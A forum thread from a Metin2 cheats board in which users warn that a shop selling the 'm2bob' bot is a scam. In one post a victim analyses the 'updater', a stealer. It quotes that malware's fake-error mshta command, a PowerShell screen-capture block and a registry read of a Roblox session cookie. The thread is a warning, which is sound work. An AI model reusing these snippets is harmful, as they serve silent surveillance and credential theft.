Register for your free account! | Forgot your password?

You last visited: Today at 05:44

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



m2bob?

Discussion on m2bob? within the Metin2 Hacks, Bots, Cheats, Exploits & Macros forum part of the Metin2 category.

Closed Thread
 
Old   #1
 
elite*gold: 0
Join Date: Oct 2016
Posts: 64
Received Thanks: 6
m2bob?

Hi!

Is this legit?

m2 bob .shop

they seem to be claiming that its the oirignal bob, I bought it a day ago, got an email with an "updater" and launcher, after I start it it says unsupported windows blabla, then BSOD, can't remove it with malwarebytes &kasperksy, on their dc I got insta banned after asking for some help, I feel like I got scammed lmao
kakikaki1 is offline  
Old   #2
 
elite*gold: 0
Join Date: Aug 2022
Posts: 1
Received Thanks: 0
habe die selbe frage.
ich habe bis jetzt m2bob nicht gekauft , aber würde gerne wissen ob m2bob wieder funktioniert
Lukako215 is offline  
Old   #3

 
.Inoffensive's Avatar
 
elite*gold: 5
Join Date: Feb 2023
Posts: 33
Received Thanks: 6
Quote:
Originally Posted by kakikaki1 View Post
Hi!

Is this legit?

m2 bob .shop

they seem to be claiming that its the oirignal bob, I bought it a day ago, got an email with an "updater" and launcher, after I start it it says unsupported windows blabla, then BSOD, can't remove it with malwarebytes &kasperksy, on their dc I got insta banned after asking for some help, I feel like I got scammed lmao
Before buying something read everywhere about it. Obviously is a scam, they offer you something that doesn’t work so like that you can’t dispute an refund because they gived you something.

Quote:
Originally Posted by Lukako215 View Post
habe die selbe frage.
ich habe bis jetzt m2bob nicht gekauft , aber würde gerne wissen ob m2bob wieder funktioniert
Don’t fall for this. Instead, you can try Xana. We offer support for GF and others private servers.
.Inoffensive is offline  
Old   #4
 
elite*gold: 0
Join Date: May 2017
Posts: 1
Received Thanks: 1
Quote:
Originally Posted by kakikaki1 View Post
Hi!

Is this legit?

m2 bob .shop

they seem to be claiming that its the oirignal bob, I bought it a day ago, got an email with an "updater" and launcher, after I start it it says unsupported windows blabla, then BSOD, can't remove it with malwarebytes &kasperksy, on their dc I got insta banned after asking for some help, I feel like I got scammed lmao
Dont buy this (m2bob . shop) just yesterday i got scammed... First you send 20€, then they write you back that their PayPal is freezed and u should ask for refund (just to seem legit) and send another 20€ to another PayPal (with +15 bonus days)... So they try to scam you for another 20€... Even if u pay another 20€ they will send you "BOT", which is KEYLOGGER (program that sends them what you write on your keyboard). So they try to scam you 3 times in row... These people are human rats
d0untik is offline  
Thanks
1 User
Old   #5
 
elite*gold: 0
Join Date: Oct 2016
Posts: 64
Received Thanks: 6
Hello everyone!
Did a bit of a research.
it's basically a Readlinestealer, and some other noname grabbers, stealers. when you open the "updater" it downloads m2.exe metin2.exe to temp files from a chinese host, opens them, and those download redline configs, then scan registry, pc name, installed apps, browser extensions, steal the pw's, userdatas.

Bob.exe same thing, but it connects to a telegram api, then sends your infos there.
Its a ****** *** py2exe.

The fake error msg comes from here : mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Unsupported WINDOWS Version or outdated CLIENT files. ERRORCODE 9042', 0, 'Unsupported Version', 0+16);close()""


$source = @" using System; using System.Collections.Generic; using System.Drawing; using System.Windows.Forms; public class Screenshot { public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; } } "@ Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms $screenshots = [Screenshot]::CaptureScreens() for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose() })

lmao
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.co m -Name .ROBLOSECURITY" (PID: 6504)
kakikaki1 is offline  
Old   #6
 
elite*gold: 0
Join Date: Aug 2020
Posts: 98
Received Thanks: 20
SCAM, fake account, if you write some words like SCAM, will be muted.
dc325nb is offline  
Old   #7
King of Hell




 
Crowley's Avatar
 
elite*gold: 708
The Black Market: 416/1/0
Join Date: Mar 2012
Posts: 6,617
Received Thanks: 1,058
First of all, this is non Question area. Second of all m2bob is dead.

#closed
Crowley is offline  
Thanks
1 User
Closed Thread


Similar Threads Similar Threads
M2BOB Funktioniert wieder! M2BOB Work Now!
12/14/2012 - Metin2 - 11 Replies
...
[TR] M2Bob Eror | M2Bob Hata
05/01/2012 - Metin2 - 0 Replies
TR:Hile için kayıt yaparken hata veriyor. EN:I couldn't register for cheat. Hata böyle(Eror picture is): http://e1205.hizliresim.com/x/1/5540b.jpg



All times are GMT +2. The time now is 05:45.


Powered by vBulletin®
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2026 elitepvpers All Rights Reserved.